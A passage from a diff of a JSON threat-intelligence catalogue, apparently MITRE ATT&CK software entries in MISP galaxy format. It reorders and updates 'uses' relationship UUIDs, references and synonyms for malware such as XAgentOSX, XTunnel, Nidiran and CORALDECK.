- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
 "tags": [
@@ -10403,13 +12141,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
 "tags": [
@@ -10418,7 +12149,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10438,34 +12176,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
 "tags": [
@@ -10473,13 +12183,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433",
 "tags": [
@@ -10487,6 +12190,34 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
 "tags": [
@@ -10494,20 +12225,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
@@ -10516,14 +12233,42 @@
 "type": "uses"
 },
 {
- "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
+ "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810",
+ "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10556,48 +12301,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
 "tags": [
@@ -10606,7 +12309,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
+ "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10619,6 +12322,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
 "tags": [
@@ -10627,7 +12337,42 @@
 "type": "uses"
 },
 {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
+ "dest-uuid": "246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10688,13 +12433,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
 "tags": [
@@ -10702,27 +12440,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466",
 "tags": [
@@ -10731,7 +12448,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10743,6 +12467,27 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "e9e9bfe2-76f4-4870-a2a1-b7af89808613",
@@ -10772,14 +12517,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10827,56 +12572,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
+ "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10897,35 +12600,35 @@
 "type": "uses"
 },
 {
- "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
+ "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638",
+ "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
+ "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10939,14 +12642,21 @@
 "type": "uses"
 },
 {
- "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f",
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -10960,7 +12670,42 @@
 "type": "uses"
 },
 {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -11071,14 +12816,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
+ "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
+ "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -11126,14 +12871,21 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11147,14 +12899,7 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11217,7 +12962,28 @@ "type": "uses" }, { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -11237,20 +13003,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ @@ -11265,13 +13017,6 @@ ], "type": "uses" }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ @@ -11280,7 +13025,7 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11291,7 +13036,7 @@ "value": "Crimson - S0115" }, { - "description": "[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX)", + "description": "[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)", "meta": { "external_id": "S0161", "mitre_platforms": [ 
@@ -11299,10 +13044,12 @@ ], "refs": [ "https://attack.mitre.org/software/S0161", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" ], "synonyms": [ - "XAgentOSX" + "XAgentOSX", + "OSX.Sofacy" ] }, "related": [ @@ -11321,28 +13068,7 @@ "type": "uses" }, { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11355,27 +13081,6 @@ ], "type": "uses" }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ 
@@ -11389,6 +13094,48 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "59a97b15-8189-4d51-9404-e1ce8ea4a069", @@ -11432,6 +13179,20 @@ ], "type": "uses" }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ 
@@ -11453,20 +13214,6 @@ ], "type": "uses" }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -11475,14 +13222,14 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11501,12 +13248,14 @@ ], "refs": [ "https://attack.mitre.org/software/S0117", - "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" ], "synonyms": [ "XTunnel", + "Trojan.Shunnael", "X-Tunnel", "XAPS" ] @@ -11533,13 +13282,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", "tags": [ 
@@ -11548,7 +13290,21 @@ "type": "uses" }, { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11569,7 +13325,7 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11581,13 +13337,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "7343e208-7cab-45f2-a47b-41ba5e2f0fab", @@ -11637,20 +13386,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -11658,6 +13393,13 @@ ], "type": "uses" }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ 
@@ -11665,6 +13407,13 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", "tags": [ @@ -11701,14 +13450,14 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11722,7 +13471,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11733,7 +13482,7 @@ "value": "Nidiran - S0118" }, { - "description": "[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [ScarCruft](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)", + "description": "[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)", "meta": { "external_id": "S0212", "mitre_platforms": [ @@ -11824,13 +13573,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "451a9977-d255-43c9-b431-66de80130c8c", "tags": [ 
